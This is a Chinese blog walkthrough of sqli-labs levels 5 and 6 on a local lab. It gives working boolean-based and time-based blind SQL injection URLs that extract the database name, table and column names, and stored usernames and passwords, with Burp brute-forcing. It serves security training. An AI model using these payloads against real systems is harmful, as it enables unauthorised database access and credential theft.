sqlilab--writeup (5~6) 布尔盲注

最新推荐文章于 2024-04-10 20:07:05 发布
最新推荐文章于 2024-04-10 20:07:05 发布
阅读量225 收藏 1
点赞数
分类专栏: sql 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45694388/article/details/110824994
版权
本文详细介绍了SQL注入攻击的原理,通过实例展示了如何利用#和--进行注释闭合,以及如何通过ASCII码进行布尔注入。在Less-5的SQL注入练习中,逐步揭示了数据库名、表名及字段名,并演示了利用布尔盲注获取数据的方法。同时,提到了单引号换双引号的技巧来绕过防御。
摘要由CSDN通过智能技术生成

1.# 和 – (有个空格)表示注释,可以使它们后面的语句不被执行。在url中,如果是get请求**(记住是get请求,也就是我们在浏览器中输入的url)** ,解释执行的时候,url中#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求中不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程中空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用–+的方式来闭合,因为+会被解释成空格。

.

2.当然,也可以使用–%20,把空格转换为urlencode编码格式,也不会报错。同理把#变成%23,也不报错

less

less 5 布尔注入

爆数据库名:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27and%20left(database(),1)>'r'--+ 二分法尝试首字母,大于r有回显,大于s无回显,故库名是s开头
在这里插入图片描述

大于d有 小于e无:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27and%20left(database(),2)%3E%27sd%27--+

或者使用burp工具对参数爆破:
在这里插入图片描述
在这里插入图片描述
最小长度1,最大长度1,将26个字母逐个burp
在这里插入图片描述

省略。。。。
在这里插入图片描述

最终可得数据库名为:security

爆表名:http://127.0.0.1/sqli-labs-master/Less-5/?id=1%27and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))%3E101--+

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

从上到下,从左到右,ascii码依次对应 users ,即表名

尝试定向爆破,以提高手工注入速度,修改limit x,1 中的x查询password是否存在表中

http://127.0.0.1/sqli-labs-master/Less-5/?id=1       %27%20and%20if(left((select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users				%27%20limit%203,1),8)=%27password%27%20,sleep(5),1)--+

在这里插入图片描述

在limit3,1回显成功,即第四列有字段password

在这里插入图片描述
同理查询到usename字段名

同理查询字段的值:
查询用户名dump:?id=1' and if(left((select username from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+
查询密码dump:?id=1' and if(left((select password from users order by id limit 0,1),4)='dumb' ,sleep(5),1)--+

或者逐位布尔判断:/Less-5/?id=1%27 and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))=68--+

less 6

单引换双引号,其余操作相同
在这里插入图片描述

b1gpig安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
HITCON-Training-Writeup:https的简要说明
04-29
HITCON培训 我为做了简短的 有关Linux二进制开发的信息,请参见。 环境设定 git clone ...cd HITCON-Training && chmod u+x ./env_setup.sh && ./env_setup.sh 大纲 基础知识 介绍 ... 面向返
sqli-labs系列5~8关【布尔盲注
学海无涯苦作舟
09-12 218
第五关 单引号型-----id='$id' 1.第一步要判断当前数据库名长度是多少,如下语句测出长度为8 目录 第五关 2.测出数据库具体的名字
sqli-lab--writeup(7~10)文件输出,时间布尔盲注
weixin_45694388的博客
12-08 224
前置知识点: 1、outfile是将检索到的数据,保存到服务器的文件内: 格式:select * into outfile “文件地址” 示例: mysql> select * into outfile ‘f:/mysql/test/one’ from teacher_class; 2、文件是自动创建的。 3,读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。, 其中当参数 secure_file_priv 为空时,对导
布尔盲注(ctfhub)_ctf 布尔盲注脚本
最新发布
2401_83704125的博客
04-10 897
布尔盲注的条件: ?id=1’ and 1=1–+ 真页面true?id=1’ and 1=2–+ 假页面false# substr(database(),1,1):表示从数据库的第1个字母开始,显示1个字母,从1开始计数# limit 0,1:表示从第0行开始,显示1行,从0开始计数 2. 根据库名长度爆库名 使用substrate()函数逐个猜数据库名 3. 爆数据表数量 使用mysql的查询语句。从1开始试错 4.爆数据表名长度 使用 limit 0,1(第一张表),limit 1,1(第二张表)
SQL布尔盲注 (Blind)基本原理及使用burpsuite进行暴力猜解
Welcome To Myon'Blog !
12-22 2018
SQL布尔盲注入是一种SQL注入攻击方式, 根据某个条件是否成立,来判断返回结果的真假,通过布尔盲注,攻击者可以逐个字符地推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。什么情况下我们会采用盲注?我们平时最常用的是union联合查询注入,这是基于页面有数据回显的条件;但是,如果无论你输入什么,页面始终都只回显两种情况,我们可以把这两种情况看成是1或者0,也就是说,要么你查的东西有,要么不存在。面对这种只回显两种情况的,我们一般是采用盲注盲注可以分为时间延迟盲注布尔盲注
sqli-labs Less-5(布尔盲注
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
01-31 621
前几篇sql注入文章 sqli-labs Less-1(联合注入、字符型注入) sqli-labs Less-2(联合注入、整形型注入) sqli-labs Less-3(联合注入、字符型注入) sqli-labs Less-4(联合注入、字符型注入) sqli-labs Less-5(利用extractvalue进行报错注入) sqli-labs Less-5(双注入) 布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利
PML-Prediction-Assignment-Writeup
05-31
在本项目中,“PML-Prediction-Assignment-Writeup-main”可能包含用于建模的数据集。 2. 数据预处理:数据预处理是任何建模任务的关键步骤,包括数据清洗(处理缺失值和异常值)、数据转换(如归一化或标准化)...
morpheme-ordering-writeup
03-20
总的来说,"morpheme-ordering-writeup"是一个关于语素排序的研究工作,可能包括理论分析、算法设计、实验验证等多个方面,使用TeX/LaTeX进行排版,通过"morpheme-ordering-writeup-master"的压缩包我们可以获取到...
leetcode不会-LC-Writeup:LC-Writeup
06-30
不会LC-Writeup 问题:未交叉的线, 方法:自顶向下的动态规划 直觉: 让A和B成为我们的两个整数数组。 假设我们想在子数组A[0...i]和B[0...j] (包括两端)中找到最大数量的未交叉线。 如果子数组共享相同的最后一...
2022-工大抗疫-web-writeup1
08-03
2022-工大抗疫-web-writeup1 本资源摘要信息聚焦于Web安全和网络协议相关知识点,涵盖了HTML、PHP、网络协议和Windows操作系统等多个方面。 一、网络协议 在Web开发中,网络协议扮演着重要角色。HTTP/1.1是目前最...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注布尔盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 2650
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
sqli-labs-基于布尔盲注
zlloveyouforever的博客
04-29 1098
sqli-labs第五关--基于布尔盲注
MISC杂项时间盲注布尔盲注脚本 鹤城杯
qq_49746811的博客
10-10 1550
0x01 流量分析 本人web狗一只,最近学了一些网络协议方面的 所以做了一下MISC的两道流量分析,大佬们都觉着太简单没放脚本,我就放一下自己下的(小菜鸡勿喷) <--第一道流量分析不难,主要就是布尔盲注的流量包分析,直接查看http请求 包即可我们可以通过观察看到注入成功的响应长度不同,这里成功的为978字节 失的为994字节.不要问为什么.其实也可以直接判断.978的流量比994的少了 非常多 显然就是成功的(因为这里是获取ASCII码.所以判断成功的流量肯定更少) 所以我们只需要提取出这一部
mysql注入天书(一)Basic Challenges
eWFuZw==的博客
09-06 825
【独家连载】mysql注入天书(一)Basic Challenges lcamry / 2016-1...
SqliLab_Mysql_Injection详解_字符型注入(二)_布尔盲注(5)
qq_41260930的博客
10-20 514
SqlLab_Mysql_Injection详解_字符型注入(三) SQL注入_布尔盲注 原理 由于服务器在接受请求后,返回的页面存在无报错,无回显的情况,这时候如果再利用UNION联合查询法查看显位就失效了,只能基于SQL语句的True or False,并通过页面的不同(显示正确或者错误)来判断,从而达到注入的目的来获取相应的信息; 布尔盲注的核心思想 正确时,页面返回正常;不正确时,页面返回...
SqliLab_Mysql_Injection详解_字符型注入(五)_时间盲注(8~10)
qq_41260930的博客
10-24 624
SqlLab_Mysql_Injection详解_字符型注入(六) SQL注入_时间盲注 原理 当在服务器后台关闭了返回页面的错误回显或过滤了某些关键字,返回的网页只会返回一种状态(无法通过传统的布尔盲注(true or false)来判断了),这时候就需要用到时间盲注了,时间盲注成功时,服务器会由于执行了构造语句中的sleep()函数,休眠一定的时间,再返回数据;通过观察浏览器客户端发送请求,到...
小白入门SQL注入基础-基于Sqli-lab平台实战
DYBOY-程序开发&网络安全
06-08 4174
简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。 0x00 SQL注入漏洞简介 有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引...
SqliLab_Mysql_Injection详解_字符型注入(七)_POST型注入_报错注入/布尔/时间盲注(14~17)
qq_41260930的博客
10-26 403
SqlLab_Mysql_Injection详解_字符型注入(八) SQL注入_POST型注入 原理 SqlLab关卡(包含14,15,16)(图片占据空间太大,payload具体返回情况均写在每条payload下的注释中) SqlLab-14(POST 型注入): 初始界面 判断注入点(关键步骤) 由初始界面显示知道,可以看到需要我们输入username和password,根据登录的查询语句的...
搭建本地SQL注入靶场:sqli-labs实战教程
"这篇教程将指导你安装sqli-labs,一个用于学习SQL注入的靶场。sqli-labs提供多样且最新的SQL漏洞环境,同时允许用户修改和审计源码,是网络安全初学者的理想实践平台。为了安全起见,推荐在本地环境而非公网服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

b1gpig安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值